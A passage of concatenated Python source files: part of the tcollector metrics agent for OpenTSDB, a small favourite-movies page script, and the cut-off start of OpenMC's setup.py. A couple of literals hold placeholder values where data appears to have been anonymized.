is going on with the tcollector.\n # TODO need to fix this for http\n if self.self_report_stats:\n strs = [\n (\'reader.lines_collected\',\n \'\', self.reader.lines_collected),\n (\'reader.lines_dropped\',\n \'\', self.reader.lines_dropped)\n ]\n\n for col in all_living_collectors():\n strs.append((\'collector.lines_sent\', \'collector=\'\n + col.name, col.lines_sent))\n strs.append((\'collector.lines_received\', \'collector=\'\n + col.name, col.lines_received))\n strs.append((\'collector.lines_invalid\', \'collector=\'\n + col.name, col.lines_invalid))\n\n ts = int(time.time())\n strout = [""tcollector.%s %d %d %s""\n % (x[0], ts, x[2], x[1]) for x in strs]\n for string in strout:\n self.sendq.append(string)\n\n break # TSD is alive.\n\n # if we get here, we assume the connection is good\n self.last_verify = time.time()\n return True\n\n def maintain_conn(self):\n """"""Safely connect to the TSD and ensure that it\'s up and\n running and that we\'re not talking to a ghost connection\n (no response).""""""\n\n # dry runs and http are always good\n if self.dryrun or self.http:\n return\n\n # connection didn\'t verify, so create a new one. we might be in\n # this method for a long time while we sort this out.\n try_delay = 1\n while ALIVE:\n if self.verify_conn():\n return\n\n # increase the try delay by some amount and some random value,\n # in case the TSD is down for a while. delay at most\n # approximately 10 minutes.\n try_delay *= 1 + random.random()\n if try_delay > 600:\n try_delay *= 0.5\n LOG.debug(\'SenderThread blocking %0.2f seconds\', try_delay)\n time.sleep(try_delay)\n\n # Now actually try the connection.\n self.pick_connection()\n try:\n addresses = socket.getaddrinfo(self.host, self.port,\n socket.AF_UNSPEC,\n socket.SOCK_STREAM, 0)\n except socket.gaierror, e:\n # Don\'t croak on transient DNS resolution issues.\n if e[0] in (socket.EAI_AGAIN, socket.EAI_NONAME,\n socket.EAI_NODATA):\n LOG.debug(\'DNS resolution failure: %s: %s\', self.host, e)\n continue\n raise\n for family, socktype, proto, canonname, sockaddr in addresses:\n try:\n self.tsd = socket.socket(family, socktype, proto)\n self.tsd.settimeout(15)\n self.tsd.connect(sockaddr)\n # if we get here it connected\n LOG.debug(\'Connection to %s was successful\'%(str(sockaddr)))\n break\n except socket.error, msg:\n LOG.warning(\'Connection attempt failed to %s:%d: %s\',\n self.host, self.port, msg)\n self.tsd.close()\n self.tsd = None\n if not self.tsd:\n LOG.error(\'Failed to connect to %s:%d\', self.host, self.port)\n self.blacklist_connection()\n\n def add_tags_to_line(self, line):\n for tag, value in self.tags:\n if \' %s=\' % tag not in line:\n line += \' %s=%s\' % (tag, value)\n return line\n\n def send_data(self):\n """"""Sends outstanding data in self.sendq to the TSD in one operation.""""""\n if self.http:\n return self.send_data_via_http()\n\n # construct the output string\n out = \'\'\n\n # in case of logging we use less efficient variant\n if LOG.level == logging.DEBUG:\n for line in self.sendq:\n line = ""put %s"" % self.add_tags_to_line(line)\n out += line + ""\\n""\n LOG.debug(\'SENDING: %s\', line)\n else:\n out = """".join(""put %s\\n"" % self.add_tags_to_line(line) for line in self.sendq)\n\n if not out:\n LOG.debug(\'send_data no data?\')\n return\n\n # try sending our data. if an exception occurs, just error and\n # try sending again next time.\n try:\n if self.dryrun:\n print out\n else:\n self.tsd.sendall(out)\n self.sendq = []\n except socket.error, msg:\n LOG.error(\'failed to send data: %s\', msg)\n try:\n self.tsd.close()\n except socket.error:\n pass\n self.tsd = None\n self.blacklist_connection()\n\n # FIXME: we should be reading the result at some point to drain\n # the packets out of the kernel\'s queue\n\n def send_data_via_http(self):\n """"""Sends outstanding data in self.sendq to TSD in one HTTP API call.""""""\n metrics = []\n for line in self.sendq:\n # print "" %s"" % line\n parts = line.split(None, 3)\n # not all metrics have metric-specific tags\n if len(parts) == 4:\n (metric, timestamp, value, raw_tags) = parts\n else:\n (metric, timestamp, value) = parts\n raw_tags = """"\n # process the tags\n metric_tags = {}\n for tag in raw_tags.strip().split():\n (tag_key, tag_value) = tag.split(""="", 1)\n metric_tags[tag_key] = tag_value\n metric_entry = {}\n metric_entry[""metric""] = metric\n metric_entry[""timestamp""] = long(timestamp)\n metric_entry[""value""] = float(value)\n metric_entry[""tags""] = dict(self.tags).copy()\n if len(metric_tags) + len(metric_entry[""tags""]) > self.maxtags:\n metric_tags_orig = set(metric_tags)\n subset_metric_keys = frozenset(metric_tags[:len(metric_tags[:self.maxtags-len(metric_entry[""tags""])])])\n metric_tags = dict((k, v) for k, v in metric_tags.iteritems() if k in subset_metric_keys)\n LOG.error(""Exceeding maximum permitted metric tags - removing %s for metric %s"",\n str(metric_tags_orig - set(metric_tags)), metric)\n metric_entry[""tags""].update(metric_tags)\n metrics.append(metric_entry)\n\n if self.dryrun:\n print ""Would have sent:\\n%s"" % json.dumps(metrics,\n sort_keys=True,\n indent=4)\n return\n\n self.pick_connection()\n # print ""Using server: %s:%s"" % (self.host, self.port)\n # url = ""http://%s:%s/api/put?details"" % (self.host, self.port)\n # print ""Url is %s"" % url\n LOG.debug(""Sending metrics to http://%s:%s/api/put?details"",\n self.host, self.port)\n if self.ssl:\n protocol = ""https""\n else:\n protocol = ""http""\n req = urllib2.Request(""%s://%s:%s/api/put?details"" % (\n protocol, self.host, self.port))\n if self.http_username and self.http_password:\n req.add_header(""Authorization"", ""Basic %s""\n % base64.b64encode(""%s:%s"" % (self.http_username, self.http_password)))\n req.add_header(""Content-Type"", ""application/json"")\n try:\n response = urllib2.urlopen(req, json.dumps(metrics))\n LOG.debug(""Received response %s"", response.getcode())\n # clear out the sendq\n self.sendq = []\n # print ""Got response code: %s"" % response.getcode()\n # print ""Content:""\n # for line in response:\n # print line,\n # print\n except urllib2.HTTPError, e:\n LOG.error(""Got error %s"", e)\n # for line in http_error:\n # print line,\n\n\ndef setup_logging(logfile=DEFAULT_LOG, max_bytes=None, backup_count=None):\n """"""Sets up logging and associated handlers.""""""\n\n LOG.setLevel(logging.INFO)\n if backup_count is not None and max_bytes is not None:\n assert backup_count > 0\n assert max_bytes > 0\n ch = RotatingFileHandler(logfile, \'a\', max_bytes, backup_count)\n else: # Setup stream handler.\n ch = logging.StreamHandler(sys.stdout)\n\n ch.setFormatter(logging.Formatter(\'%(asctime)s %(name)s[%(process)d] \'\n \'%(levelname)s: %(message)s\'))\n LOG.addHandler(ch)\n\n\ndef parse_cmdline(argv):\n """"""Parses the command-line.""""""\n\n # get arguments\n default_cdir = os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])),\n \'collectors\')\n parser = OptionParser(description=\'Manages collectors which gather \'\n \'data and report back.\')\n parser.add_option(\'-c\', \'--collector-dir\', dest=\'cdir\', metavar=\'DIR\',\n default=default_cdir,\n help=\'Directory where the collectors are located.\')\n parser.add_option(\'-d\', \'--dry-run\', dest=\'dryrun\', action=\'store_true\',\n default=False,\n help=\'Don\\\'t actually send anything to the TSD, \'\n \'just print the datapoints.\')\n parser.add_option(\'-D\', \'--daemonize\', dest=\'daemonize\', action=\'store_true\',\n default=False, help=\'Run as a background daemon.\')\n parser.add_option(\'-H\', \'--host\', dest=\'host\', default=\'localhost\',\n metavar=\'HOST\',\n help=\'Hostname to use to connect to the TSD.\')\n parser.add_option(\'-L\', \'--hosts-list\', dest=\'hosts\', default=False,\n metavar=\'HOSTS\',\n help=\'List of host:port to connect to tsd\\\'s (comma separated).\')\n parser.add_option(\'--no-tcollector-stats\', dest=\'no_tcollector_stats\',\n default=False, action=\'store_true\',\n help=\'Prevent tcollector from reporting its own stats to TSD\')\n parser.add_option(\'-s\', \'--stdin\', dest=\'stdin\', action=\'store_true\',\n default=False,\n help=\'Run once, read and dedup data points from stdin.\')\n parser.add_option(\'-p\', \'--port\', dest=\'port\', type=\'int\',\n default=DEFAULT_PORT, metavar=\'PORT\',\n help=\'Port to connect to the TSD instance on. \'\n \'default=%default\')\n parser.add_option(\'-v\', dest=\'verbose\', action=\'store_true\', default=False,\n help=\'Verbose mode (log debug messages).\')\n parser.add_option(\'-t\', \'--tag\', dest=\'tags\', action=\'append\',\n default=[], metavar=\'TAG\',\n help=\'Tags to append to all timeseries we send, \'\n \'e.g.: -t TAG=VALUE -t TAG2=VALUE\')\n parser.add_option(\'-P\', \'--pidfile\', dest=\'pidfile\',\n default=\'/var/run/tcollector.pid\',\n metavar=\'FILE\', help=\'Write our pidfile\')\n parser.add_option(\'--dedup-interval\', dest=\'dedupinterval\', type=\'int\',\n default=300, metavar=\'DEDUPINTERVAL\',\n help=\'Number of seconds in which successive duplicate \'\n \'datapoints are suppressed before sending to the TSD. \'\n \'Use zero to disable. \'\n \'default=%default\')\n parser.add_option(\'--evict-interval\', dest=\'evictinterval\', type=\'int\',\n default=6000, metavar=\'EVICTINTERVAL\',\n help=\'Number of seconds after which to remove cached \'\n \'values of old data points to save memory. \'\n \'default=%default\')\n parser.add_option(\'--allowed-inactivity-time\', dest=\'allowed_inactivity_time\', type=\'int\',\n default=ALLOWED_INACTIVITY_TIME, metavar=\'ALLOWEDINACTIVITYTIME\',\n help=\'How long to wait for datapoints before assuming \'\n \'a collector is dead and restart it. \'\n \'default=%default\')\n parser.add_option(\'--remove-inactive-collectors\', dest=\'remove_inactive_collectors\', action=\'store_true\',\n default=False, help=\'Remove collectors not sending data \'\n \'in the max allowed inactivity interval\')\n parser.add_option(\'--max-bytes\', dest=\'max_bytes\', type=\'int\',\n default=64 * 1024 * 1024,\n help=\'Maximum bytes per a logfile.\')\n parser.add_option(\'--backup-count\', dest=\'backup_count\', type=\'int\',\n default=0, help=\'Maximum number of logfiles to backup.\')\n parser.add_option(\'--logfile\', dest=\'logfile\', type=\'str\',\n default=DEFAULT_LOG,\n help=\'Filename where logs are written to.\')\n parser.add_option(\'--reconnect-interval\',dest=\'reconnectinterval\', type=\'int\',\n default=0, metavar=\'RECONNECTINTERVAL\',\n help=\'Number of seconds after which the connection to\'\n \'the TSD hostname reconnects itself. This is useful\'\n \'when the hostname is a multiple A record (RRDNS).\'\n )\n parser.add_option(\'--max-tags\', dest=\'maxtags\', type=int, default=8,\n help=\'The maximum number of tags to send to our TSD Instances\')\n parser.add_option(\'--http\', dest=\'http\', action=\'store_true\', default=False,\n help=\'Send the data via the http interface\')\n parser.add_option(\'--http-username\', dest=\'http_username\', default=False,\n help=\'Username to use for HTTP Basic Auth when sending the data via HTTP\')\n parser.add_option(\'--http-password\', dest=\'http_password\', default=False,\n help=\'Password to use for HTTP Basic Auth when sending the data via HTTP\')\n parser.add_option(\'--ssl\', dest=\'ssl\', action=\'store_true\', default=False,\n help=\'Enable SSL - used in conjunction with http\')\n (options, args) = parser.parse_args(args=argv[1:])\n if options.dedupinterval < 0:\n parser.error(\'--dedup-interval must be at least 0 seconds\')\n if options.evictinterval <= options.dedupinterval:\n parser.error(\'--evict-interval must be strictly greater than \'\n \'--dedup-interval\')\n if options.reconnectinterval < 0:\n parser.error(\'--reconnect-interval must be at least 0 seconds\')\n # We cannot write to stdout when we\'re a daemon.\n if (options.daemonize or options.max_bytes) and not options.backup_count:\n options.backup_count = 1\n return (options, args)\n\n\ndef daemonize():\n """"""Performs the necessary dance to become a background daemon.""""""\n if os.fork():\n os._exit(0)\n os.chdir(""/"")\n os.umask(022)\n os.setsid()\n os.umask(0)\n if os.fork():\n os._exit(0)\n stdin = open(os.devnull)\n stdout = open(os.devnull, \'w\')\n os.dup2(stdin.fileno(), 0)\n os.dup2(stdout.fileno(), 1)\n os.dup2(stdout.fileno(), 2)\n stdin.close()\n stdout.close()\n os.umask(022)\n for fd in xrange(3, 1024):\n try:\n os.close(fd)\n except OSError: # This FD wasn\'t opened...\n pass # ... ignore the exception.\n\n\ndef setup_python_path(collector_dir):\n """"""Sets up PYTHONPATH so that collectors can easily import common code.""""""\n mydir = os.path.dirname(collector_dir)\n libdir = os.path.join(mydir, \'collectors\', \'lib\')\n if not os.path.isdir(libdir):\n return\n pythonpath = os.environ.get(\'PYTHONPATH\', \'\')\n if pythonpath:\n pythonpath += \':\'\n pythonpath += mydir\n os.environ[\'PYTHONPATH\'] = pythonpath\n LOG.debug(\'Set PYTHONPATH to %r\', pythonpath)\n\n\ndef main(argv):\n """"""The main tcollector entry point and loop.""""""\n\n options, args = parse_cmdline(argv)\n if options.daemonize:\n daemonize()\n setup_logging(options.logfile, options.max_bytes or None,\n options.backup_count or None)\n\n if options.verbose:\n LOG.setLevel(logging.DEBUG) # up our level\n\n if options.pidfile:\n write_pid(options.pidfile)\n\n # validate everything\n tags = {}\n for tag in options.tags:\n if re.match(\'^[-_.a-z0-9]+=\\S+$\', tag, re.IGNORECASE) is None:\n assert False, \'Tag string ""%s"" is invalid.\' % tag\n k, v = tag.split(\'=\', 1)\n if k in tags:\n assert False, \'Tag ""%s"" already declared.\' % k\n tags[k] = v\n\n if not \'host\' in tags and not options.stdin:\n tags[\'host\'] = socket.gethostname()\n LOG.warning(\'Tag ""host"" not specified, defaulting to %s.\', tags[\'host\'])\n\n options.cdir = os.path.realpath(options.cdir)\n if not os.path.isdir(options.cdir):\n LOG.fatal(\'No such directory: %s\', options.cdir)\n return 1\n modules = load_etc_dir(options, tags)\n\n setup_python_path(options.cdir)\n\n # gracefully handle death for normal termination paths and abnormal\n atexit.register(shutdown)\n for sig in (signal.SIGTERM, signal.SIGINT):\n signal.signal(sig, shutdown_signal)\n\n # at this point we\'re ready to start processing, so start the ReaderThread\n # so we can have it running and pulling in data for us\n reader = ReaderThread(options.dedupinterval, options.evictinterval)\n reader.start()\n\n # prepare list of (host, port) of TSDs given on CLI\n if not options.hosts:\n options.hosts = [(options.host, options.port)]\n else:\n def splitHost(hostport):\n if "":"" in hostport:\n # Check if we have an IPv6 address.\n if hostport[0] == ""["" and ""]:"" in hostport:\n host, port = hostport.split(""]:"")\n host = host[1:]\n else:\n host, port = hostport.split("":"")\n return (host, int(port))\n return (hostport, DEFAULT_PORT)\n options.hosts = [splitHost(host) for host in options.hosts.split("","")]\n if options.host != ""localhost"" or options.port != DEFAULT_PORT:\n options.hosts.append((options.host, options.port))\n\n # and setup the sender to start writing out to the tsd\n sender = SenderThread(reader, options.dryrun, options.hosts,\n not options.no_tcollector_stats, tags, options.reconnectinterval,\n options.http, options.http_username,\n options.http_password, options.ssl, options.maxtags)\n sender.start()\n LOG.info(\'SenderThread startup complete\')\n\n # if we\'re in stdin mode, build a stdin collector and just join on the\n # reader thread since there\'s nothing else for us to do here\n if options.stdin:\n register_collector(StdinCollector())\n stdin_loop(options, modules, sender, tags)\n else:\n sys.stdin.close()\n main_loop(options, modules, sender, tags)\n\n # We\'re exiting, make sure we don\'t leave any collector behind.\n for col in all_living_collectors():\n col.shutdown()\n LOG.debug(\'Shutting down -- joining the reader thread.\')\n reader.join()\n LOG.debug(\'Shutting down -- joining the sender thread.\')\n sender.join()\n\ndef stdin_loop(options, modules, sender, tags):\n """"""The main loop of the program that runs when we are in stdin mode.""""""\n\n global ALIVE\n next_heartbeat = int(time.time() + 600)\n while ALIVE:\n time.sleep(15)\n reload_changed_config_modules(modules, options, sender, tags)\n now = int(time.time())\n if now >= next_heartbeat:\n LOG.info(\'Heartbeat (%d collectors running)\'\n % sum(1 for col in all_living_collectors()))\n next_heartbeat = now + 600\n\ndef main_loop(options, modules, sender, tags):\n """"""The main loop of the program that runs when we\'re not in stdin mode.""""""\n\n next_heartbeat = int(time.time() + 600)\n while ALIVE:\n populate_collectors(options.cdir)\n reload_changed_config_modules(modules, options, sender, tags)\n reap_children()\n check_children(options)\n spawn_children()\n time.sleep(15)\n now = int(time.time())\n if now >= next_heartbeat:\n LOG.info(\'Heartbeat (%d collectors running)\'\n % sum(1 for col in all_living_collectors()))\n next_heartbeat = now + 600\n\n\ndef list_config_modules(etcdir):\n """"""Returns an iterator that yields the name of all the config modules.""""""\n if not os.path.isdir(etcdir):\n return iter(()) # Empty iterator.\n return (name for name in os.listdir(etcdir)\n if (name.endswith(\'.py\')\n and os.path.isfile(os.path.join(etcdir, name))))\n\n\ndef load_etc_dir(options, tags):\n """"""Loads any Python module from tcollector\'s own \'etc\' directory.\n\n Returns: A dict of path -> (module, timestamp).\n """"""\n\n etcdir = os.path.join(options.cdir, \'etc\')\n sys.path.append(etcdir) # So we can import modules from the etc dir.\n modules = {} # path -> (module, timestamp)\n for name in list_config_modules(etcdir):\n path = os.path.join(etcdir, name)\n module = load_config_module(name, options, tags)\n modules[path] = (module, os.path.getmtime(path))\n return modules\n\n\ndef load_config_module(name, options, tags):\n """"""Imports the config module of the given name\n\n The \'name\' argument can be a string, in which case the module will be\n loaded by name, or it can be a module object, in which case the module\n will get reloaded.\n\n If the module has an \'onload\' function, calls it.\n Returns: the reference to the module loaded.\n """"""\n\n if isinstance(name, str):\n LOG.info(\'Loading %s\', name)\n d = {}\n # Strip the trailing .py\n module = __import__(name[:-3], d, d)\n else:\n module = reload(name)\n onload = module.__dict__.get(\'onload\')\n if callable(onload):\n try:\n onload(options, tags)\n except:\n LOG.fatal(\'Exception while loading %s\', name)\n raise\n return module\n\n\ndef reload_changed_config_modules(modules, options, sender, tags):\n """"""Reloads any changed modules from the \'etc\' directory.\n\n Args:\n cdir: The path to the \'collectors\' directory.\n modules: A dict of path -> (module, timestamp).\n Returns: whether or not anything has changed.\n """"""\n\n etcdir = os.path.join(options.cdir, \'etc\')\n current_modules = set(list_config_modules(etcdir))\n current_paths = set(os.path.join(etcdir, name)\n for name in current_modules)\n changed = False\n\n # Reload any module that has changed.\n for path, (module, timestamp) in modules.iteritems():\n if path not in current_paths: # Module was removed.\n continue\n mtime = os.path.getmtime(path)\n if mtime > timestamp:\n LOG.info(\'Reloading %s, file has changed\', path)\n module = load_config_module(module, options, tags)\n modules[path] = (module, mtime)\n changed = True\n\n # Remove any module that has been removed.\n for path in set(modules).difference(current_paths):\n LOG.info(\'%s has been removed, tcollector should be restarted\', path)\n del modules[path]\n changed = True\n\n # Check for any modules that may have been added.\n for name in current_modules:\n path = os.path.join(etcdir, name)\n if path not in modules:\n module = load_config_module(name, options, tags)\n modules[path] = (module, os.path.getmtime(path))\n changed = True\n\n return changed\n\n\ndef write_pid(pidfile):\n """"""Write our pid to a pidfile.""""""\n f = open(pidfile, ""w"")\n try:\n f.write(str(os.getpid()))\n finally:\n f.close()\n\n\ndef all_collectors():\n """"""Generator to return all collectors.""""""\n\n return COLLECTORS.itervalues()\n\n\n# collectors that are not marked dead\ndef all_valid_collectors():\n """"""Generator to return all defined collectors that haven\'t been marked\n dead in the past hour, allowing temporarily broken collectors a\n chance at redemption.""""""\n\n now = int(time.time())\n for col in all_collectors():\n if not col.dead or (now - col.lastspawn > 3600):\n yield col\n\n\n# collectors that have a process attached (currenty alive)\ndef all_living_collectors():\n """"""Generator to return all defined collectors that have\n an active process.""""""\n\n for col in all_collectors():\n if col.proc is not None:\n yield col\n\n\ndef shutdown_signal(signum, frame):\n """"""Called when we get a signal and need to terminate.""""""\n LOG.warning(""shutting down, got signal %d"", signum)\n shutdown()\n\n\ndef kill(proc, signum=signal.SIGTERM):\n os.killpg(proc.pid, signum)\n\n\ndef shutdown():\n """"""Called by atexit and when we receive a signal, this ensures we properly\n terminate any outstanding children.""""""\n\n global ALIVE\n # prevent repeated calls\n if not ALIVE:\n return\n # notify threads of program termination\n ALIVE = False\n\n LOG.info(\'shutting down children\')\n\n # tell everyone to die\n for col in all_living_collectors():\n col.shutdown()\n\n LOG.info(\'exiting\')\n sys.exit(1)\n\n\ndef reap_children():\n """"""When a child process dies, we have to determine why it died and whether\n or not we need to restart it. This method manages that logic.""""""\n\n for col in all_living_collectors():\n now = int(time.time())\n # FIXME: this is not robust. the asyncproc module joins on the\n # reader threads when you wait if that process has died. this can cause\n # slow dying processes to hold up the main loop. good for now though.\n status = col.proc.poll()\n if status is None:\n continue\n col.proc = None\n\n # behavior based on status. a code 0 is normal termination, code 13\n # is used to indicate that we don\'t want to restart this collector.\n # any other status code is an error and is logged.\n if status == 13:\n LOG.info(\'removing %s from the list of collectors (by request)\',\n col.name)\n col.dead = True\n elif status != 0:\n LOG.warning(\'collector %s terminated after %d seconds with \'\n \'status code %d, marking dead\',\n col.name, now - col.lastspawn, status)\n col.dead = True\n else:\n register_collector(Collector(col.name, col.interval, col.filename,\n col.mtime, col.lastspawn))\n\ndef check_children(options):\n """"""When a child process hasn\'t received a datapoint in a while,\n assume it\'s died in some fashion and restart it.""""""\n\n for col in all_living_collectors():\n now = int(time.time())\n\n if col.last_datapoint < (now - options.allowed_inactivity_time):\n # It\'s too old, kill it\n LOG.warning(\'Terminating collector %s after %d seconds of inactivity\',\n col.name, now - col.last_datapoint)\n col.shutdown()\n if not options.remove_inactive_collectors:\n register_collector(Collector(col.name, col.interval, col.filename,\n col.mtime, col.lastspawn))\n\n\ndef set_nonblocking(fd):\n """"""Sets the given file descriptor to non-blocking mode.""""""\n fl = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK\n fcntl.fcntl(fd, fcntl.F_SETFL, fl)\n\n\ndef spawn_collector(col):\n """"""Takes a Collector object and creates a process for it.""""""\n\n LOG.info(\'%s (interval=%d) needs to be spawned\', col.name, col.interval)\n\n # FIXME: do custom integration of Python scripts into memory/threads\n # if re.search(\'\\.py$\', col.name) is not None:\n # ... load the py module directly instead of using a subprocess ...\n try:\n col.proc = subprocess.Popen(col.filename, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n close_fds=True,\n preexec_fn=os.setsid)\n except OSError, e:\n LOG.error(\'Failed to spawn collector %s: %s\' % (col.filename, e))\n return\n # The following line needs to move below this line because it is used in\n # other logic and it makes no sense to update the last spawn time if the\n # collector didn\'t actually start.\n col.lastspawn = int(time.time())\n set_nonblocking(col.proc.stdout.fileno())\n set_nonblocking(col.proc.stderr.fileno())\n if col.proc.pid > 0:\n col.dead = False\n LOG.info(\'spawned %s (pid=%d)\', col.name, col.proc.pid)\n return\n # FIXME: handle errors better\n LOG.error(\'failed to spawn collector: %s\', col.filename)\n\n\ndef spawn_children():\n """"""Iterates over our defined collectors and performs the logic to\n determine if we need to spawn, kill, or otherwise take some\n action on them.""""""\n\n if not ALIVE:\n return\n\n for col in all_valid_collectors():\n now = int(time.time())\n if col.interval == 0:\n if col.proc is None:\n spawn_collector(col)\n elif col.interval <= now - col.lastspawn:\n if col.proc is None:\n spawn_collector(col)\n continue\n\n # I\'m not very satisfied with this path. It seems fragile and\n # overly complex, maybe we should just reply on the asyncproc\n # terminate method, but that would make the main tcollector\n # block until it dies... :|\n if col.nextkill > now:\n continue\n if col.killstate == 0:\n LOG.warning(\'warning: %s (interval=%d, pid=%d) overstayed \'\n \'its welcome, SIGTERM sent\',\n col.name, col.interval, col.proc.pid)\n kill(col.proc)\n col.nextkill = now + 5\n col.killstate = 1\n elif col.killstate == 1:\n LOG.error(\'error: %s (interval=%d, pid=%d) still not dead, \'\n \'SIGKILL sent\',\n col.name, col.interval, col.proc.pid)\n kill(col.proc, signal.SIGKILL)\n col.nextkill = now + 5\n col.killstate = 2\n else:\n LOG.error(\'error: %s (interval=%d, pid=%d) needs manual \'\n \'intervention to kill it\',\n col.name, col.interval, col.proc.pid)\n col.nextkill = now + 300\n\n\ndef populate_collectors(coldir):\n """"""Maintains our internal list of valid collectors. This walks the\n collector directory and looks for files. In subsequent calls, this\n also looks for changes to the files -- new, removed, or updated files,\n and takes the right action to bring the state of our running processes\n in line with the filesystem.""""""\n\n global GENERATION\n GENERATION += 1\n\n # get numerics from scriptdir, we\'re only setup to handle numeric paths\n # which define intervals for our monitoring scripts\n for interval in os.listdir(coldir):\n if not interval.isdigit():\n continue\n interval = int(interval)\n\n for colname in os.listdir(\'%s/%d\' % (coldir, interval)):\n if colname.startswith(\'.\'):\n continue\n\n filename = \'%s/%d/%s\' % (coldir, interval, colname)\n if os.path.isfile(filename) and os.access(filename, os.X_OK):\n mtime = os.path.getmtime(filename)\n\n # if this collector is already \'known\', then check if it\'s\n # been updated (new mtime) so we can kill off the old one\n # (but only if it\'s interval 0, else we\'ll just get\n # it next time it runs)\n if colname in COLLECTORS:\n col = COLLECTORS[colname]\n\n # if we get a dupe, then ignore the one we\'re trying to\n # add now. there is probably a more robust way of doing\n # this...\n if col.interval != interval:\n LOG.error(\'two collectors with the same name %s and \'\n \'different intervals %d and %d\',\n colname, interval, col.interval)\n continue\n\n # we have to increase the generation or we will kill\n # this script again\n col.generation = GENERATION\n if col.mtime < mtime:\n LOG.info(\'%s has been updated on disk\', col.name)\n col.mtime = mtime\n if not col.interval:\n col.shutdown()\n LOG.info(\'Respawning %s\', col.name)\n register_collector(Collector(colname, interval,\n filename, mtime))\n else:\n register_collector(Collector(colname, interval, filename,\n mtime))\n\n # now iterate over everybody and look for old generations\n to_delete = []\n for col in all_collectors():\n if col.generation < GENERATION:\n LOG.info(\'collector %s removed from the filesystem, forgetting\',\n col.name)\n col.shutdown()\n to_delete.append(col.name)\n for name in to_delete:\n del COLLECTORS[name]\n\n\nif __name__ == \'__main__\':\n sys.exit(main(sys.argv))\n', 'import media\nimport fav_movies_web\n\n# Instances of my favorite movies:\n\n# Deadpool movie: movie title, sotryline, poster image and movie trailer\ndeadpool = media.Movie(""Deadpool"",\n """""" Wade Wilson (Ryan Reynolds) is a former Special Forces\n operative who now works as a mercenary. His world comes\n crashing down when evil scientist Ajax (Ed Skrein)\n tortures, disfigures and transforms him into Deadpool.\n The rogue experiment leaves Deadpool with accelerated\n healing powers and a twisted sense of humor. With help\n from mutant allies Colossus and Negasonic Teenage\n Warhead (Brianna Hildebrand), Deadpool uses his new\n skills to hunt down the man who nearly destroyed\n his life"""""",\n ""https://www.flickeringmyth.com/wp-content/uploads/2016/01/Deadpool-poster-1.jpg"", # NOQA\n ""https://www.youtube.com/watch?v=Xithigfg7dA""\n ) # NOQA\n\n# Focus movie: movie title, sotryline, poster image and movie trailer\nfocus = media.Movie(""Focus"",\n """"""Nicky (Will Smith), a veteran con artist, takes a\n novice named Jess(Margot Robbie) under his wing. While\n Nicky teaches Jess the tricks of the trade, the pair\n become romantically involved; but, when Jess gets\n uncomfortably close, Nicky ends their relationship."""""",\n ""http://static.rogerebert.PI:KEY.jpg"", # NOQA\n ""https://www.youtube.com/watch?v=MxCRgtdAuBo""\n ) # NOQA\n\n# Mechanic: Resurrection movie: movie title, sotryline, poster image and\n# movie trailer\nmechanic = media.Movie(""Mechanic: Resurrection"",\n """"""Living under cover in Brazil, master assassin Arthur\n Bishop(Jason Statham) springs back into action after an\n old enemySam Hazeldine) kidnaps the woman (Jessica Alba)\n he loves. To saveher life, Bishop must kill an\n imprisoned African warlord, a humantrafficker (Toby\n Eddington) and an arms dealer (Tommy Lee Jones),all\n while making the deaths look like accidents. When things\n don\'t goexactly as planned, Bishop turns the tables on\n the people who forcedhim out of retirement."""""",\n ""https://images-na.ssl-images-amazon.com/images/M/MV5BMjYwODExNzUwMV5BMl5BanBnXkFtZTgwNTgwNjUyOTE@._V1_UY1200_CR90,0,630,1200_AL_.jpg"", # NOQA\n ""https://www.youtube.com/watch?v=G-P3f_wDXvs""\n ) # NOQA\n\n# Enemy movie: movie title, sotryline, poster image and movie trailer\nenemy = media.Movie(""Enemy"",\n """"""A mild-mannered college professor (Jake Gyllenhaal)\n discovers a look-alike actor and delves into the other\n man\'s private affairs."""""",\n ""http://www.impawards.com/intl/misc/2014/posters/enemy.jpg"", # NOQA\n ""https://www.youtube.com/watch?v=FJuaAWrgoUY""\n ) # NOQA\n\n# Wonder Woman movie: movie title, sotryline, poster image and movie trailer\nwonder_woman = media.Movie(""Wonder Woman"",\n """"""Before she was Wonder Woman (Gal Gadot), she was\n Diana, princess ofthe Amazons, trained to be an\n unconquerable warrior. Raised on asheltered island\n paradise, Diana meets an American pilot (Chris Pine)\n who tells her about the massive conflict that\'s\n raging in the outsideworld. Convinced that she can\n stop the threat, Diana leaves herhome for the first\n time. Fighting alongside men in a war to end\n allwars, she finally discovers her full powers and\n true destiny"""""",\n ""http://cdn2-www.comingsoon.net/assets/uploads/gallery/wonder-woman/wwposter5.jpg"", # NOQA\n ""https://www.youtube.com/watch?v=1Q8fG0TtVAY""\n ) # NOQA\n\n# Ghost in the Shell movie: movie title, sotryline, poster image and movie\n# trailer\nghost_in_the_shell = media.Movie(""Ghost in the Shell"",\n """"""In the near future, Major is the first of\n herkind: a human who iscyber-enhanced to be a\n perfect soldier devoted to stopping theworld\'s\n most dangerous criminals. When terrorism\n reaches a newlevel that includes the ability\n to hack into people\'s minds and control them,\n Major is uniquely qualified to stop it. As\n sheprepares to face a new enemy, Major\n discovers that her life was stoleninstead of\n saved. Now, she will stop at nothing to\n recover her pastwhile punishing those who did\n this to her."""""",\n ""http://cdn2-www.comingsoon.net/assets/uploads/gallery/ghost-in-the-shell/ghostinshellposter.jpg"", # NOQA\n ""https://www.youtube.com/watch?v=G4VmJcZR0Yg""\n ) # NOQA\n\n# All instances grouped together in a list\n# The list is the sit of the movies that will be passed to the media file\nmovies = [\n deadpool,\n focus,\n mechanic,\n enemy, wonder_woman,\n ghost_in_the_shell\n]\n\n# Open the HTML file in a webbrowser via the fav_movies_web.py\nfav_movies_web.open_movies_page(movies) # the array/list (argument)\n', ""#!/usr/bin/env python\n\nimport glob\nimport numpy as np\ntry:\n from setuptools import setup\n have_setuptools = True\nexcept ImportError:\n from distutils.core import setup\n have_setuptools = False\n\ntry:\n from Cython.Build import cythonize\n have_cython = True\nexcept ImportError:\n have_cython = False\n\nkwargs = {'name': 'openmc',\n 'version': '0.8.0',\n 'packages': ['openmc', 'openmc.data', 'openmc.mgxs', 'openmc.model',\n 'openmc.stats'],\n 'scripts': glob.glob('scripts/openmc-*'),\n\n # Metadata\n 'author': 'Will Boyd',\n 'author_email': dummy@email.com',\n 'description': 'OpenMC Python API',\n 'url': 'https://github.com/mit-crpg/openmc',\n 'classifiers': [\n 'Intended Audience :: Developers',\n 'Intended Audience :: End Users/Desktop',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT 